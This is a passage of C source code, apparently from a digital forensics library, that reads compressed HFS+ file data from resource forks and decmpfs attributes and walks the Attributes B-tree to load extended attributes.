char *rawBuf = NULL; // compressed data
char *uncBuf = NULL; // uncompressed data
uint32_t offsetTableOffset;
uint32_t offsetTableSize; // The number of table entries
CMP_OFFSET_ENTRY *offsetTable = NULL;
size_t indx; // index for looping over the offset table
TSK_OFF_T off = 0; // the offset in the uncompressed data stream consumed thus far
if (tsk_verbose)
tsk_fprintf(stderr,
"%s: Entered, because this is a compressed file with compressed data in the resource fork\n", __func__);
// clean up any error messages that are lying around
tsk_error_reset();
if ((fs_attr == NULL) || (fs_attr->fs_file == NULL)
|| (fs_attr->fs_file->meta == NULL)
|| (fs_attr->fs_file->fs_info == NULL)) {
tsk_error_set_errno(TSK_ERR_FS_ARG);
tsk_error_set_errstr("%s: Null arguments given\n", __func__);
return 1;
}
// Check that the ATTR being read is the main DATA resource, 128-0,
// because this is the only one that can be compressed in HFS+
if ((fs_attr->id != HFS_FS_ATTR_ID_DATA) ||
(fs_attr->type != TSK_FS_ATTR_TYPE_HFS_DATA)) {
error_detected(TSK_ERR_FS_ARG,
"%s: arg specified an attribute %u-%u that is not the data fork. "
"Only the data fork can be compressed.", __func__, fs_attr->type,
fs_attr->id);
return 1;
}
/* This MUST be a compressed attribute */
if (!(fs_attr->flags & TSK_FS_ATTR_COMP)) {
error_detected(TSK_ERR_FS_FWALK,
"%s: called with non-special attribute: %x",
__func__, fs_attr->flags);
return 1;
}
fs = fs_attr->fs_file->fs_info;
fs_file = fs_attr->fs_file;
/******** Open the Resource Fork ***********/
// find the attribute for the resource fork
rAttr =
tsk_fs_file_attr_get_type(fs_file, TSK_FS_ATTR_TYPE_HFS_RSRC,
HFS_FS_ATTR_ID_RSRC, TRUE);
if (rAttr == NULL) {
error_returned
(" %s: could not get the attribute for the resource fork of the file", __func__);
return 1;
}
// read the offset table from the fork header
if (!read_block_table(rAttr, &offsetTable, &offsetTableSize, &offsetTableOffset)) {
return 1;
}
// Allocate two buffers for the raw and uncompressed data
/* Raw data can be COMPRESSION_UNIT_SIZE+1 if the data is not
* compressed and there is a 1-byte flag that indicates that
* the data is not compressed. */
rawBuf = (char *) tsk_malloc(COMPRESSION_UNIT_SIZE + 1);
if (rawBuf == NULL) {
error_returned
(" %s: buffers for reading and uncompressing", __func__);
goto on_error;
}
uncBuf = (char *) tsk_malloc(COMPRESSION_UNIT_SIZE);
if (uncBuf == NULL) {
error_returned
(" %s: buffers for reading and uncompressing", __func__);
goto on_error;
}
// FOR entry in the table DO
for (indx = 0; indx < offsetTableSize; ++indx) {
ssize_t uncLen; // uncompressed length
unsigned int blockSize;
uint64_t lumpSize;
uint64_t remaining;
char *lumpStart;
switch ((uncLen = read_and_decompress_block(
rAttr, rawBuf, uncBuf,
offsetTable, offsetTableSize, offsetTableOffset, indx,
decompress_block)))
{
case -1:
goto on_error;
case 0:
continue;
default:
break;
}
// Call the a_action callback with "Lumps"
// that are at most the block size.
blockSize = fs->block_size;
remaining = uncLen;
lumpStart = uncBuf;
while (remaining > 0) {
int retval; // action return value
lumpSize = remaining <= blockSize ? remaining : blockSize;
// Apply the callback function
if (tsk_verbose)
tsk_fprintf(stderr,
"%s: Calling action on lump of size %"
PRIu64 " offset %" PRIu64 " in the compression unit\n",
__func__, lumpSize, uncLen - remaining);
if (lumpSize > SIZE_MAX) {
error_detected(TSK_ERR_FS_FWALK,
" %s: lumpSize is too large for the action", __func__);
goto on_error;
}
retval = a_action(fs_attr->fs_file, off, 0, lumpStart,
(size_t) lumpSize, // cast OK because of above test
TSK_FS_BLOCK_FLAG_COMP, ptr);
if (retval == TSK_WALK_ERROR) {
error_detected(TSK_ERR_FS | 201,
"%s: callback returned an error", __func__);
goto on_error;
}
else if (retval == TSK_WALK_STOP) {
break;
}
// Find the next lump
off += lumpSize;
remaining -= lumpSize;
lumpStart += lumpSize;
}
}
// Done, so free up the allocated resources.
free(offsetTable);
free(rawBuf);
free(uncBuf);
return 0;
on_error:
free(offsetTable);
free(rawBuf);
free(uncBuf);
return 1;
}
#ifdef HAVE_LIBZ
static uint8_t
hfs_attr_walk_zlib_rsrc(const TSK_FS_ATTR * fs_attr,
int flags, TSK_FS_FILE_WALK_CB a_action, void *ptr)
{
return hfs_attr_walk_compressed_rsrc(
fs_attr, flags, a_action, ptr,
hfs_read_zlib_block_table,
hfs_decompress_zlib_block
);
}
#endif
static uint8_t
hfs_attr_walk_lzvn_rsrc(const TSK_FS_ATTR * fs_attr,
int flags, TSK_FS_FILE_WALK_CB a_action, void *ptr)
{
return hfs_attr_walk_compressed_rsrc(
fs_attr, flags, a_action, ptr,
hfs_read_lzvn_block_table,
hfs_decompress_lzvn_block
);
}
/** \internal
*
* @returns number of bytes read or -1 on error (incl if offset is past EOF)
*/
static ssize_t
hfs_file_read_compressed_rsrc(const TSK_FS_ATTR * a_fs_attr,
TSK_OFF_T a_offset, char *a_buf, size_t a_len,
int (*read_block_table)(const TSK_FS_ATTR *rAttr,
CMP_OFFSET_ENTRY** offsetTableOut,
uint32_t* tableSizeOut,
uint32_t* tableOffsetOut),
int (*decompress_block)(char* rawBuf,
uint32_t len,
char* uncBuf,
uint64_t* uncLen))
{
TSK_FS_FILE *fs_file;
const TSK_FS_ATTR *rAttr;
char *rawBuf = NULL;
char *uncBuf = NULL;
uint32_t offsetTableOffset;
uint32_t offsetTableSize; // Size of the offset table
CMP_OFFSET_ENTRY *offsetTable = NULL;
size_t indx; // index for looping over the offset table
uint32_t startUnit = 0;
uint32_t startUnitOffset = 0;
uint32_t endUnit = 0;
uint64_t bytesCopied;
if (tsk_verbose)
tsk_fprintf(stderr,
"%s: called because this file is compressed, with data in the resource fork\n", __func__);
// Reading zero bytes? OK at any offset, I say!
if (a_len == 0)
return 0;
if (a_offset < 0) {
error_detected(TSK_ERR_FS_ARG,
"%s: reading from file at a negative offset",
__func__);
return -1;
}
if (a_len > SIZE_MAX / 2) {
error_detected(TSK_ERR_FS_ARG,
"%s: trying to read more than SIZE_MAX/2 is not supported.",
__func__);
return -1;
}
if ((a_fs_attr == NULL) || (a_fs_attr->fs_file == NULL)
|| (a_fs_attr->fs_file->meta == NULL)
|| (a_fs_attr->fs_file->fs_info == NULL)) {
error_detected(TSK_ERR_FS_ARG,
"%s: NULL parameters passed", __func__);
return -1;
}
// This should be a compressed file. If not, that's an error!
if (!(a_fs_attr->flags & TSK_FS_ATTR_COMP)) {
error_detected(TSK_ERR_FS_ARG,
"%s: called with non-special attribute: %x",
__func__, a_fs_attr->flags);
return -1;
}
// Check that the ATTR being read is the main DATA resource, 4352-0,
// because this is the only one that can be compressed in HFS+
if ((a_fs_attr->id != HFS_FS_ATTR_ID_DATA) ||
(a_fs_attr->type != TSK_FS_ATTR_TYPE_HFS_DATA)) {
error_detected(TSK_ERR_FS_ARG,
"%s: arg specified an attribute %u-%u that is not the data fork. "
"Only the data fork can be compressed.", __func__,
a_fs_attr->type, a_fs_attr->id);
return -1;
}
/******** Open the Resource Fork ***********/
// The file
fs_file = a_fs_attr->fs_file;
// find the attribute for the resource fork
rAttr =
tsk_fs_file_attr_get_type(fs_file, TSK_FS_ATTR_TYPE_HFS_RSRC,
HFS_FS_ATTR_ID_RSRC, TRUE);
if (rAttr == NULL) {
error_returned
(" %s: could not get the attribute for the resource fork of the file", __func__);
return -1;
}
// read the offset table from the fork header
if (!read_block_table(rAttr, &offsetTable, &offsetTableSize, &offsetTableOffset)) {
return -1;
}
// Compute the range of compression units needed for the request
startUnit = a_offset / COMPRESSION_UNIT_SIZE;
startUnitOffset = a_offset % COMPRESSION_UNIT_SIZE;
endUnit = (a_offset + a_len - 1) / COMPRESSION_UNIT_SIZE;
if (startUnit >= offsetTableSize || endUnit >= offsetTableSize) {
error_detected(TSK_ERR_FS_ARG,
"%s: range of bytes requested %lld - %lld falls past the "
"end of the uncompressed stream %llu\n",
__func__, a_offset, a_offset + a_len,
offsetTable[offsetTableSize-1].offset +
offsetTable[offsetTableSize-1].length);
goto on_error;
}
if (tsk_verbose)
tsk_fprintf(stderr,
"%s: reading compression units: %" PRIu32
" to %" PRIu32 "\n", __func__, startUnit, endUnit);
bytesCopied = 0;
// Allocate buffers for the raw and uncompressed data
/* Raw data can be COMPRESSION_UNIT_SIZE+1 if the zlib data is not
* compressed and there is a 1-byte flag that indicates that
* the data is not compressed. */
rawBuf = (char *) tsk_malloc(COMPRESSION_UNIT_SIZE + 1);
if (rawBuf == NULL) {
error_returned
(" %s: buffers for reading and uncompressing", __func__);
goto on_error;
}
uncBuf = (char *) tsk_malloc(COMPRESSION_UNIT_SIZE);
if (uncBuf == NULL) {
error_returned
(" %s: buffers for reading and uncompressing", __func__);
goto on_error;
}
// Read from the indicated comp units
for (indx = startUnit; indx <= endUnit; ++indx) {
uint64_t uncLen;
char *uncBufPtr = uncBuf;
size_t bytesToCopy;
switch ((uncLen = read_and_decompress_block(
rAttr, rawBuf, uncBuf,
offsetTable, offsetTableSize, offsetTableOffset, indx,
decompress_block)))
{
case -1:
goto on_error;
case 0:
continue;
default:
break;
}
// If this is the first comp unit, then we must skip over the
// startUnitOffset bytes.
if (indx == startUnit) {
uncLen -= startUnitOffset;
uncBufPtr += startUnitOffset;
}
// How many bytes to copy from this compression unit?
if (bytesCopied + uncLen < (uint64_t) a_len) // cast OK because a_len > 0
bytesToCopy = (size_t) uncLen; // uncLen <= size of compression unit, which is small, so cast is OK
else
bytesToCopy = (size_t) (((uint64_t) a_len) - bytesCopied); // diff <= compression unit size, so cast is OK
// Copy into the output buffer, and update bookkeeping.
memcpy(a_buf + bytesCopied, uncBufPtr, bytesToCopy);
bytesCopied += bytesToCopy;
}
// Well, we don't know (without a lot of work) what the
// true uncompressed size of the stream is. All we know is the "upper bound" which
// assumes that all of the compression units expand to their full size. If we did
// know the true size, then we could reject requests that go beyond the end of the
// stream. Instead, we treat the stream as if it is padded out to the full size of
// the last compression unit with zeros.
// Have we read and copied all of the bytes requested?
if (bytesCopied < a_len) {
// set the remaining bytes to zero
memset(a_buf + bytesCopied, 0, a_len - (size_t) bytesCopied); // cast OK because diff must be < compression unit size
}
free(offsetTable);
free(rawBuf);
free(uncBuf);
return (ssize_t) bytesCopied; // cast OK, cannot be greater than a_len which cannot be greater than SIZE_MAX/2 (rounded down).
on_error:
free(offsetTable);
free(rawBuf);
free(uncBuf);
return -1;
}
#ifdef HAVE_LIBZ
static ssize_t
hfs_file_read_zlib_rsrc(const TSK_FS_ATTR * a_fs_attr,
TSK_OFF_T a_offset, char *a_buf, size_t a_len)
{
return hfs_file_read_compressed_rsrc(
a_fs_attr, a_offset, a_buf, a_len,
hfs_read_zlib_block_table,
hfs_decompress_zlib_block
);
}
#endif
static ssize_t
hfs_file_read_lzvn_rsrc(const TSK_FS_ATTR * a_fs_attr,
TSK_OFF_T a_offset, char *a_buf, size_t a_len)
{
return hfs_file_read_compressed_rsrc(
a_fs_attr, a_offset, a_buf, a_len,
hfs_read_lzvn_block_table,
hfs_decompress_lzvn_block
);
}
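/** \internal
 * Handles a decmpfs attribute whose payload is stored uncompressed: the
 * returned buffer simply points past the 1-byte flag at the start of the
 * raw data, so the caller must not free it (*dstBufFree is set to FALSE).
 *
 * @returns 1 on success
 */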
static int hfs_decompress_noncompressed_attr(char* rawBuf, uint32_t rawSize, uint64_t uncSize, char** dstBuf, uint64_t* dstSize, int* dstBufFree) {
if (tsk_verbose)
tsk_fprintf(stderr,
"%s: Leading byte, 0x%02x, indicates that the data is not really compressed.\n"
"%s: Loading the default DATA attribute.", __func__, rawBuf[0], __func__);
*dstBuf = rawBuf + 1; // + 1 indicator byte
*dstSize = uncSize;
*dstBufFree = FALSE;
return 1;
}
static int hfs_decompress_zlib_attr(char* rawBuf, uint32_t rawSize, uint64_t uncSize, char** dstBuf, uint64_t* dstSize, int* dstBufFree)
{
if ((rawBuf[0] & 0x0F) == 0x0F) {
return hfs_decompress_noncompressed_attr(
rawBuf, rawSize, uncSize, dstBuf, dstSize, dstBufFree);
}
else {
#ifdef HAVE_LIBZ
char* uncBuf = NULL;
uint64_t uLen;
unsigned long bytesConsumed;
int infResult;
if (tsk_verbose)
tsk_fprintf(stderr,
"%s: Uncompressing (inflating) data.", __func__);
// Uncompress the remainder of the attribute, and load as 128-0
// Note: cast is OK because uncSize will be quite modest, < 4000.
uncBuf = (char *) tsk_malloc((size_t) uncSize + 100); // add some extra space
if (uncBuf == NULL) {
error_returned
(" - %s, space for the uncompressed attr", __func__);
return 0;
}
infResult = zlib_inflate(rawBuf, (uint64_t) rawSize,
uncBuf, (uint64_t) (uncSize + 100),
&uLen, &bytesConsumed);
if (infResult != 0) {
error_returned
(" %s, zlib could not uncompress attr", __func__);
free(uncBuf);
return 0;
}
if (bytesConsumed != rawSize) {
error_detected(TSK_ERR_FS_READ,
" %s, decompressor did not consume the whole compressed data",
__func__);
free(uncBuf);
return 0;
}
*dstBuf = uncBuf;
*dstSize = uncSize;
*dstBufFree = TRUE;
#else
// ZLIB compression library is not available, so we will load a
// zero-length default DATA attribute. Without this, icat may
// misbehave.
if (tsk_verbose)
tsk_fprintf(stderr,
"%s: ZLIB not available, so loading an empty default DATA attribute.\n", __func__);
// Dummy is one byte long, so the ptr is not null, but we set the
// length to zero bytes, so it is never read.
static uint8_t dummy[1];
*dstBuf = dummy;
*dstSize = 0;
*dstBufFree = FALSE;
#endif
}
return 1;
}
static int hfs_decompress_lzvn_attr(char* rawBuf, uint32_t rawSize, uint64_t uncSize, char** dstBuf, uint64_t* dstSize, int* dstBufFree)
{
if (rawBuf[0] == 0x06) {
return hfs_decompress_noncompressed_attr(
rawBuf, rawSize, uncSize, dstBuf, dstSize, dstBufFree);
}
char* uncBuf = (char *) tsk_malloc((size_t) uncSize);
if (uncBuf == NULL) {
error_returned
(" - %s, space for the uncompressed attr", __func__);
return 0;
}
*dstSize = lzvn_decode_buffer(uncBuf, uncSize, rawBuf, rawSize);
*dstBuf = uncBuf;
*dstBufFree = TRUE;
return 1;
}
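/** \internal
 * Loads the data of a file whose content is stored inline in the
 * com.apple.decmpfs extended attribute. The attribute consists of a 16-byte
 * compression record followed by the (possibly compressed) payload; the
 * payload is decompressed with decompress_attr and attached to the file as
 * a resident default DATA attribute.
 *
 * @returns 1 on success, 0 on error
 */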
static int
hfs_file_read_compressed_attr(TSK_FS_FILE* fs_file,
uint8_t cmpType,
char* buffer,
uint32_t attributeLength,
uint64_t uncSize,
int (*decompress_attr)(char* rawBuf,
uint32_t rawSize,
uint64_t uncSize,
char** dstBuf,
uint64_t* dstSize,
int* dstBufFree))
{
// Data is inline. We will load the uncompressed data as a
// resident attribute.
if (tsk_verbose)
tsk_fprintf(stderr,
"%s: Compressed data is inline in the attribute, will load this as the default DATA attribute.\n", __func__);
if (attributeLength <= 16) {
if (tsk_verbose)
tsk_fprintf(stderr,
"%s: WARNING, Compression Record of type %u is not followed by"
" compressed data. No data will be loaded into the DATA"
" attribute.\n", __func__, cmpType);
// oddly, this is not actually considered an error
return 1;
}
TSK_FS_ATTR *fs_attr_unc;
// There is data following the compression record, as there should be.
if ((fs_attr_unc = tsk_fs_attrlist_getnew(
fs_file->meta->attr, TSK_FS_ATTR_RES)) == NULL)
{
error_returned(" - %s, FS_ATTR for uncompressed data", __func__);
return 0;
}
char* dstBuf;
uint64_t dstSize;
int dstBufFree = FALSE;
if (!decompress_attr(buffer + 16, attributeLength - 16, uncSize,
&dstBuf, &dstSize, &dstBufFree)) {
return 0;
}
if (dstSize != uncSize) {
error_detected(TSK_ERR_FS_READ,
" %s, actual uncompressed size not equal to the size in the compression record", __func__);
goto on_error;
}
if (tsk_verbose)
tsk_fprintf(stderr,
"%s: Loading decompressed data as default DATA attribute.",
__func__);
// Load the remainder of the attribute as 128-0
// set the details in the fs_attr structure.
// Note, we are loading this as a RESIDENT attribute.
if (tsk_fs_attr_set_str(fs_file,
fs_attr_unc, "DATA",
TSK_FS_ATTR_TYPE_HFS_DATA,
HFS_FS_ATTR_ID_DATA, dstBuf,
dstSize))
{
error_returned(" - %s", __func__);
goto on_error;
}
if (dstBufFree) {
free(dstBuf);
}
return 1;
on_error:
if (dstBufFree) {
free(dstBuf);
}
return 0;
}
static int hfs_file_read_zlib_attr(TSK_FS_FILE* fs_file,
char* buffer,
uint32_t attributeLength,
uint64_t uncSize)
{
return hfs_file_read_compressed_attr(
fs_file, DECMPFS_TYPE_ZLIB_ATTR,
buffer, attributeLength, uncSize,
hfs_decompress_zlib_attr
);
}
static int hfs_file_read_lzvn_attr(TSK_FS_FILE* fs_file,
char* buffer,
uint32_t attributeLength,
uint64_t uncSize)
{
return hfs_file_read_compressed_attr(
fs_file, DECMPFS_TYPE_LZVN_ATTR,
buffer, attributeLength, uncSize,
hfs_decompress_lzvn_attr
);
}
typedef struct {
TSK_FS_INFO *fs; // the HFS file system
TSK_FS_FILE *file; // the Attributes file, if open
hfs_btree_header_record *header; // the Attributes btree header record.
// For Convenience, unpacked values.
TSK_ENDIAN_ENUM endian;
uint32_t rootNode;
uint16_t nodeSize;
uint16_t maxKeyLen;
} ATTR_FILE_T;
/** \internal
* Open the Attributes file, and read the btree header record. Fill in the fields of the ATTR_FILE_T struct.
*
* @param fs -- the HFS file system
* @param header -- the header record struct
*
* @return 1 on error, 0 on success
*/
static uint8_t
open_attr_file(TSK_FS_INFO * fs, ATTR_FILE_T * attr_file)
{
int cnt; // will hold bytes read
hfs_btree_header_record *hrec;
// clean up any error messages that are lying around
tsk_error_reset();
if (fs == NULL) {
tsk_error_set_errno(TSK_ERR_FS_ARG);
tsk_error_set_errstr("open_attr_file: fs is NULL");
return 1;
}
if (attr_file == NULL) {
tsk_error_set_errno(TSK_ERR_FS_ARG);
tsk_error_set_errstr("open_attr_file: attr_file is NULL");
return 1;
}
// Open the Attributes File
attr_file->file =
tsk_fs_file_open_meta(fs, NULL, HFS_ATTRIBUTES_FILE_ID);
if (attr_file->file == NULL) {
tsk_error_set_errno(TSK_ERR_FS_READ);
tsk_error_set_errstr
("open_attr_file: could not open the Attributes file");
return 1;
}
// Allocate some space for the Attributes btree header record (which
// is passed back to the caller)
hrec = (hfs_btree_header_record *)
malloc(sizeof(hfs_btree_header_record));
if (hrec == NULL) {
tsk_error_set_errno(TSK_ERR_FS);
tsk_error_set_errstr
("open_attr_file: could not malloc space for Attributes header record");
return 1;
}
// Read the btree header record
cnt = tsk_fs_file_read(attr_file->file,
14,
(char *) hrec,
sizeof(hfs_btree_header_record), (TSK_FS_FILE_READ_FLAG_ENUM) 0);
if (cnt != sizeof(hfs_btree_header_record)) {
tsk_error_set_errno(TSK_ERR_FS_READ);
tsk_error_set_errstr
("open_attr_file: could not open the Attributes file");
tsk_fs_file_close(attr_file->file);
free(hrec);
return 1;
}
// Fill in the fields of the attr_file struct (which was passed in by the caller)
attr_file->fs = fs;
attr_file->header = hrec;
attr_file->endian = fs->endian;
attr_file->nodeSize = tsk_getu16(attr_file->endian, hrec->nodesize);
attr_file->rootNode = tsk_getu32(attr_file->endian, hrec->rootNode);
attr_file->maxKeyLen = tsk_getu16(attr_file->endian, hrec->maxKeyLen);
return 0;
}
/** \internal
* Closes and frees the data structures associated with ATTR_FILE_T
*/
static uint8_t
close_attr_file(ATTR_FILE_T * attr_file)
{
if (attr_file == NULL) {
tsk_error_set_errno(TSK_ERR_FS_READ);
tsk_error_set_errstr("close_attr_file: NULL attr_file arg");
return 1;
}
if (attr_file->file != NULL) {
tsk_fs_file_close(attr_file->file);
attr_file->file = NULL;
}
if (attr_file->header != NULL) {
free(attr_file->header);
attr_file->header = NULL;
}
attr_file->rootNode = 0;
attr_file->nodeSize = 0;
// Note that we leave the fs component alone.
return 0;
}
static const char *
hfs_attrTypeName(uint32_t typeNum)
{
switch (typeNum) {
case TSK_FS_ATTR_TYPE_HFS_DEFAULT:
return "DFLT";
case TSK_FS_ATTR_TYPE_HFS_DATA:
return "DATA";
case TSK_FS_ATTR_TYPE_HFS_EXT_ATTR:
return "ExATTR";
case TSK_FS_ATTR_TYPE_HFS_COMP_REC:
return "CMPF";
case TSK_FS_ATTR_TYPE_HFS_RSRC:
return "RSRC";
default:
return "UNKN";
}
}
// TODO: Function description is missing; it is not clear what this function
// is supposed to return and under which circumstances.
static uint8_t
hfs_load_extended_attrs(TSK_FS_FILE * fs_file,
unsigned char *isCompressed, unsigned char *cmpType,
uint64_t *uncompressedSize)
{
TSK_FS_INFO *fs = fs_file->fs_info;
uint64_t fileID;
ATTR_FILE_T attrFile;
int cnt; // count of chars read from file.
uint8_t *nodeData;
TSK_ENDIAN_ENUM endian;
hfs_btree_node *nodeDescriptor; // The node descriptor
uint32_t nodeID; // The number or ID of the Attributes file node to read.
hfs_btree_key_attr *keyB; // ptr to the key of the Attr file record.
unsigned char done; // Flag to indicate that we are done looping over leaf nodes
uint16_t attribute_counter = 2; // The ID of the next attribute to be loaded.
HFS_INFO *hfs;
char *buffer = NULL; // buffer to hold the attribute
TSK_LIST *nodeIDs_processed = NULL; // Keep track of node IDs to prevent an infinite loop
tsk_error_reset();
// The CNID (or inode number) of the file
// Note that in TSK such numbers are 64 bits, but in HFS+ they are only 32 bits.
fileID = fs_file->meta->addr;
if (fs == NULL) {
error_detected(TSK_ERR_FS_ARG,
"hfs_load_extended_attrs: NULL fs arg");
return 1;
}
hfs = (HFS_INFO *) fs;
if (!hfs->has_attributes_file) {
// No attributes file, and so, no extended attributes
return 0;
}
if (tsk_verbose) {
tsk_fprintf(stderr,
"hfs_load_extended_attrs: Processing file %" PRIuINUM "\n",
fileID);
}
// Open the Attributes File
if (open_attr_file(fs, &attrFile)) {
error_returned
("hfs_load_extended_attrs: could not open Attributes file");
return 1;
}
// Is the Attributes file empty?
if (attrFile.rootNode == 0) {
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_load_extended_attrs: Attributes file is empty\n");
close_attr_file(&attrFile);
*isCompressed = FALSE;
*cmpType = 0;
return 0;
}
// A place to hold one node worth of data
nodeData = (uint8_t *) malloc(attrFile.nodeSize);
if (nodeData == NULL) {
error_detected(TSK_ERR_AUX_MALLOC,
"hfs_load_extended_attrs: Could not malloc space for an Attributes file node");
goto on_error;
}
// Initialize these
*isCompressed = FALSE;
*cmpType = 0;
endian = attrFile.fs->endian;
// Start with the root node
nodeID = attrFile.rootNode;
// While loop, over nodes in path from root node to the correct LEAF node.
while (1) {
uint16_t numRec; // Number of records in the node
int recIndx; // index for looping over records
if (tsk_verbose) {
tsk_fprintf(stderr,
"hfs_load_extended_attrs: Reading Attributes File node with ID %"
PRIu32 "\n", nodeID);
}
/* Make sure we do not get into an infinite loop */
if (tsk_list_find(nodeIDs_processed, nodeID)) {
error_detected(TSK_ERR_FS_READ,
"hfs_load_extended_attrs: Infinite loop detected - trying to read node %" PRIu32 " which has already been processed", nodeID);
goto on_error;
}
/* Read the node */
cnt = tsk_fs_file_read(attrFile.file,
(TSK_OFF_T)nodeID * attrFile.nodeSize,
(char *) nodeData,
attrFile.nodeSize, (TSK_FS_FILE_READ_FLAG_ENUM) 0);
if (cnt != attrFile.nodeSize) {
error_returned
("hfs_load_extended_attrs: Could not read in a node from the Attributes File");
goto on_error;
}
/* Save this node ID to the list of processed nodes */
if (tsk_list_add(&nodeIDs_processed, nodeID)) {
error_detected(TSK_ERR_FS_READ,
"hfs_load_extended_attrs: Could not save nodeID to the list of processed nodes");
goto on_error;
}
/** Node has a:
* Descriptor
* Set of records
* Table at the end with pointers to the records
*/
// Parse the Node header
nodeDescriptor = (hfs_btree_node *) nodeData;
// If we are at a leaf node, then we have found the right node
if (nodeDescriptor->type == HFS_ATTR_NODE_LEAF) {
break;
}
// This had better be an INDEX node, if not its an error
else if (nodeDescriptor->type != HFS_ATTR_NODE_INDEX) {
error_detected(TSK_ERR_FS_READ,
"hfs_load_extended_attrs: Reached a non-INDEX and non-LEAF node in searching the Attributes File");
goto on_error;
}
// OK, we are in an INDEX node. loop over the records to find the last one whose key is
// smaller than or equal to the desired key
numRec = tsk_getu16(endian, nodeDescriptor->num_rec);
if (numRec == 0) {
// This is wrong, there must always be at least 1 record in an INDEX node.
error_detected(TSK_ERR_FS_READ,
"hfs_load_extended_attrs: Attributes File index node %"
PRIu32 " has zero records", nodeID);
goto on_error;
}
for (recIndx = 0; recIndx < numRec; ++recIndx) {
uint16_t keyLength;
int comp; // comparison result
char *compStr; // comparison result, as a string
uint8_t *recData; // pointer to the data part of the record
uint32_t keyFileID;
// The offset to the record is stored in table at end of node
uint8_t *recOffsetTblEntry = &nodeData[attrFile.nodeSize - (2 * (recIndx + 1))]; // data describing where this record is
uint16_t recOffset = tsk_getu16(endian, recOffsetTblEntry);
//uint8_t * nextRecOffsetData = &nodeData[attrFile.nodeSize - 2* (recIndx+2)];
// make sure the record and first fields are in the buffer
if (recOffset + 14 > attrFile.nodeSize) {
error_detected(TSK_ERR_FS_READ,
"hfs_load_extended_attrs: Unable to process attribute (offset too big)");
goto on_error;
}
// Pointer to first byte of record
uint8_t *recordBytes = &nodeData[recOffset];
// Cast that to the Attributes file key (n.b., the key is the first thing in the record)
keyB = (hfs_btree_key_attr *) recordBytes;
// Is this key less than what we are seeking?
//int comp = comp_attr_key(endian, keyB, fileID, attrName, startBlock);
keyFileID = tsk_getu32(endian, keyB->file_id);
if (keyFileID < fileID) {
comp = -1;
compStr = "less than";
}
else if (keyFileID > fileID) {
comp = 1;
compStr = "greater than";
}
else {
comp = 0;
compStr = "equal to";
}
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_load_extended_attrs: INDEX record %d, fileID %"
PRIu32 " is %s the file ID we are seeking, %" PRIu32
".\n", recIndx, keyFileID, compStr, fileID);
if (comp > 0) {
// The key of this record is greater than what we are seeking
if (recIndx == 0) {
// This is the first record, so no records are appropriate
// Nothing in this btree will match. We can stop right here.
goto on_exit;
}
// This is not the first record, so, the previous record's child is the one we want.
break;
}
// CASE: key in this record matches the key we are seeking. The previous record's child
// is the one we want. However, if this is the first record, then we want THIS record's child.
if (comp == 0 && recIndx != 0) {
break;
}
// Extract the child node ID from the record data (stored after the key)
keyLength = tsk_getu16(endian, keyB->key_len);
// make sure the fields we care about are still in the buffer
// +2 is because key_len doesn't include its own length
// +4 is because of the amount of data we read from the data
if (recOffset + keyLength + 2 + 4 > attrFile.nodeSize) {
error_detected(TSK_ERR_FS_READ,
"hfs_load_extended_attrs: Unable to process attribute");
goto on_error;
}
recData = &recordBytes[keyLength + 2];
// Data must start on an even offset from the beginning of the record.
// So, correct this if needed.
if ((recData - recordBytes) % 2) {
recData += 1;
}
// The next four bytes should be the Node ID of the child of this node.
nodeID = tsk_getu32(endian, recData);
// At this point, either comp<0 or comp=0 && recIndx=0. In the latter case we want to
// descend to the child of this node, so we break.
if (recIndx == 0 && comp == 0) {
break;
}
// CASE: key in this record is less than key we seek. comp < 0
// So, continue looping over records in this node.
} // END loop over records
} // END while loop over Nodes in path from root to LEAF node
// At this point nodeData holds the contents of a LEAF node with the right range of keys
// and nodeDescriptor points to the descriptor of that node.
// Loop over successive LEAF nodes, starting with this one
done = FALSE;
while (!done) {
uint16_t numRec; // number of records
unsigned int recIndx; // index for looping over records
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_load_extended_attrs: Attributes File LEAF Node %"
PRIu32 ".\n", nodeID);
numRec = tsk_getu16(endian, nodeDescriptor->num_rec);
// Note, leaf node could have one (or maybe zero) records
// Loop over the records in this node
for (recIndx = 0; recIndx < numRec; ++recIndx) {
// The offset to the record is stored in table at end of node
uint8_t *recOffsetTblEntry = &nodeData[attrFile.nodeSize - (2 * (recIndx + 1))]; // data describing where this record is
uint16_t recOffset = tsk_getu16(endian, recOffsetTblEntry);
int comp; // comparison result
char *compStr; // comparison result as a string
uint32_t keyFileID;
// make sure the record and first fields are in the buffer
if (recOffset + 14 > attrFile.nodeSize) {
error_detected(TSK_ERR_FS_READ,
"hfs_load_extended_attrs: Unable to process attribute (offset too big)");
goto on_error;
}
// Pointer to first byte of record
uint8_t *recordBytes = &nodeData[recOffset];
// Cast that to the Attributes file key
keyB = (hfs_btree_key_attr *) recordBytes;
// Compare recordBytes key to the key that we are seeking
keyFileID = tsk_getu32(endian, keyB->file_id);
//fprintf(stdout, " Key file ID = %lu\n", keyFileID);
if (keyFileID < fileID) {
comp = -1;
compStr = "less than";
}
else if (keyFileID > fileID) {
comp = 1;
compStr = "greater than";
}
else {
comp = 0;
compStr = "equal to";
}
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_load_extended_attrs: LEAF Record key file ID %"
PRIu32 " is %s the desired file ID %" PRIu32 "\n",
keyFileID, compStr, fileID);
// Are they the same?
if (comp == 0) {
// Yes, so load this attribute
uint8_t *recData; // pointer to the data part of the recordBytes
hfs_attr_data *attrData;
uint32_t attributeLength;
uint32_t nameLength;
uint32_t recordType;
uint16_t keyLength;
int conversionResult;
char nameBuff[HFS_MAX_ATTR_NAME_LEN_UTF8_B+1];
TSK_FS_ATTR_TYPE_ENUM attrType;
TSK_FS_ATTR *fs_attr; // Points to the attribute to be loaded.
keyLength = tsk_getu16(endian, keyB->key_len);
// make sure the fields we care about are still in the buffer
// +2 because key_len doesn't include its own length
// +16 for the amount of data we'll read from data
if (recOffset + keyLength + 2 + 16 > attrFile.nodeSize) {
error_detected(TSK_ERR_FS_READ,
"hfs_load_extended_attrs: Unable to process attribute");
goto on_error;
}
recData = &recordBytes[keyLength + 2];
// Data must start on an even offset from the beginning of the record.
// So, correct this if needed.
if ((recData - recordBytes) % 2) {
recData += 1;
}
attrData = (hfs_attr_data *) recData;
// Check we can process the record type before allocating memory
recordType = tsk_getu32(endian, attrData->record_type);
if (recordType != HFS_ATTR_RECORD_INLINE_DATA) {
error_detected(TSK_ERR_FS_UNSUPTYPE,
"hfs_load_extended_attrs: Unsupported record type: (%d)",
recordType);
